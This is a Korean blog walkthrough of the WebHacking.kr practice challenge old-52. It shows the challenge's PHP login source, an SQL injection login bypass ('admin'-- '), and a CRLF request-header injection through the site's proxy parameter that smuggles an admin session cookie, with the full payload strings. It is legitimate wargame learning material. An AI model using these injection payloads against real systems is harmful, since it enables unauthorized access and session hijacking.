WebHacking.kr Challenge old-52

목표 : 리버스 프록시, Request Header Injection (%0d%0a)

목표와 guest 아이디 비밀번호, 프록시 정보가 주어진다.

어드민 페이지에서는 아이디와 비밀번호 입력을 요구한다. 게스트로 로그인은 되지만 관리자 로그인을 요구하고, 이리저리 sql injection을 넣다보니 소스를 볼 수 있는 페이지로 리다이렉트됐다.

// Include configuration file
include "config.php";

// If 'view_source' GET parameter is set, call the view_source() function
if ($_GET['view_source']) view_source();

// If 'logout' GET parameter is set to 1, reset the session's 'login' value and redirect to the homepage
if ($_GET['logout'] == 1) {
    $_SESSION['login'] = "";
    exit("<script>location.href='./';</script>");
}

// If the user is logged in (session 'login' has a value), display their username
if ($_SESSION['login']) {
    echo "hi {$_SESSION['login']}<br>";

    // If the logged-in user is 'admin' and their IP address starts with '172.17.0.', show the flag
    if ($_SESSION['login'] == "admin") {
        if (preg_match("/^172\.17\.0\./", $_SERVER['REMOTE_ADDR'])) echo $flag;
        else echo "Only access from virtual IP address";
    } else {
        // If the user is not 'admin', display a message saying they're not an admin
        echo "You are not admin";
    }

    // Display a logout link
    echo "<br><a href=./?logout=1>[logout]</a>";
    exit;
}

// If the user is not logged in and the 'HTTP_REFERER' contains 'logout=1', display a login prompt
if (!$_SESSION['login']) {
    if (preg_match("/logout=1/", $_SERVER['HTTP_REFERER'])) {
        header('WWW-Authenticate: Basic realm="Protected Area"');
        header('HTTP/1.0 401 Unauthorized');
    }

    // If the user has provided authentication details, attempt to log them in
    if ($_SERVER['PHP_AUTH_USER']) {
        $id = $_SERVER['PHP_AUTH_USER'];
        $pw = $_SERVER['PHP_AUTH_PW'];
        $pw = md5($pw); // Hash the password with MD5

        // Connect to the database and query the 'member' table for the provided 'id' and 'pw'
        $db = dbconnect();
        $query = "select id from member where id='{$id}' and pw='{$pw}'";
        $result = mysqli_fetch_array(mysqli_query($db, $query));

        // If a matching user is found, set the session 'login' value and redirect to the homepage
        if ($result['id']) {
            $_SESSION['login'] = $result['id'];
            exit("<script>location.href='./';</script>");
        }
    }

    // If the user is still not logged in, display a login prompt
    if (!$_SESSION['login']) {
        header('WWW-Authenticate: Basic realm="Protected Area"');
        header('HTTP/1.0 401 Unauthorized');
        echo "Login Fail";
    }
}
PHP
복사

사용자를 로그인하고 특정 IP 주소로 관리자에게 플래그를 표시하며 사용자가 로그아웃할 수 있도록 하는 간단한 PHP 인증 시스템이다.

프록시 값을 다음과 같다.

Request
GET / HTTP/1.1
Host: webhacking.kr:10008
Connection: Close


Response
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 08:02:40 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 159
Connection: close
Content-Type: text/html; charset=UTF-8

Your mission is to access admin page
guest account is guest / guest
here is proxy just for fun
PHP
복사

일단 어드민 페이지에 들어가야한다고 하고 IP가 172.17.0 대역이 아니면 거절 당하는걸 봐서 admin 로그인 방식 자체를 막아두지는 않았을거다.

admin'-- abcde
JSON
복사

실제로 로그인은 손쉽게 된다.

이미 admin에 대한 세션값을 가지고 있으니 ip 값만 바꿔주면 된다.

이제 프록시 서버를 이용해 내부 서버에서 접근한 형태로 만들어야 한다.

프록시 개념을 정리하기 정말 좋은 짧고 굵은 글이다. 프록시에 대해 잘 몰랐다면 한 번 읽어보자

[웹 서버] Proxy 서버와 Forward, Reverse 프록시

1. 프록시 서버란 무엇인가? Proxy는 대리, 대리인 의미를 가진 단어이다. 이 처럼 단어 의미에서 짐작해볼 수 있듯, 서비스를 제공하는 서버 대신 무언가를 수행하는 서버이다. 프록시 서버의 주된 역할은, 웹 서비스 프로그램(이하 웹 서버)의 로드 감소이다. 좀 더 쉽게 이해하기 위해서 웹 서비스의 전체적인 과정을 아래의 그림을 보고 이야기 하자. 일반적으로 웹 서비스는 크게 (1) 클라이언트 - (2) 웹 - (3) 웹 서버의 3개의 영역을 관통하면서 제공된다. (1) 클라이언트는 서비스를 이용하는 사용자이며, 자신이 원하는 페이지, 파일을 (2) 웹을 통해 (3) 웹 서버에 요청하게 되며, (3) 웹 서버는 (1) 클라이언트의 요청에 맞는 데이터를 준비해서 응답한다. 위와 같이 연속된 웹 서비스 ..

https://jcdgods.tistory.com/322#none

프록시 페이지를 살펴보면 page=/로 특정 페이지로 이동할 수 있다.

/admin/ 을 입력했더니 401 Unauthorized실패가 나온다. 그럼 이렇게 쉽게 될리가 없지.

리퀘스트 헤더에 내용 삽입을 해야만 접근이 가능하겠다.

개행 기준으로 내용이 나오고 있으므로 %0d%0a를 통해 Request에 개행이 가능한지부터 살펴본다.

바로 이어 실제로 인식이 되는지 테스트해보면 아래와 같이 200 OK를 띄워주는걸 확인할 수 있다.

즉 리퀘스트 헤더를 맘대로 만들 수 있는 Header Injection 이 가능하다.

/%20HTTP/1.1%0d%0aHost:%20webhacking.kr%0d%0aConnection:%20Close%0d%0a%0d%0a
#/%20HTTP/1.1%0d%0aHost:%20webhacking.kr%0d%0aConnection:%20Close%0d%0a는 개행이 2번 끊어지지 않아서 400error가 나타난다..
PHP
복사

// If the user is logged in (session 'login' has a value), display their username
if ($_SESSION['login']) {
    echo "hi {$_SESSION['login']}<br>";

    // If the logged-in user is 'admin' and their IP address starts with '172.17.0.', show the flag
    if ($_SESSION['login'] == "admin") {
        if (preg_match("/^172\.17\.0\./", $_SERVER['REMOTE_ADDR'])) echo $flag;
        else echo "Only access from virtual IP address";
    } else {
        // If the user is not 'admin', display a message saying they're not an admin
        echo "You are not admin";
    }

    // Display a logout link
    echo "<br><a href=./?logout=1>[logout]</a>";
    exit;
}
PHP
복사

우리는 세션을 확인하고 세션이 admin이면 다음 if 문으로 넘어가는 걸 볼 수 있다. 즉 admin으로 로그인한 세션 쿠키 값을 넣어주자.

?page=/admin/%20HTTP/1.1%0d%0aHost:%20webhacking.kr:10008%0d%0aCookie:%20PHPSESSID=YourCookie%0d%0aConnection:%20Close%0d%0a%0d%0a
PHP
복사

플래그를 획득했다.

✓ 다른 [워게임] 포스트

︎ 더 많은 게시물을 보려면

Blog - AbsolRoot

︎ 작성자가 궁금하면?

박필근 | AbsolRoot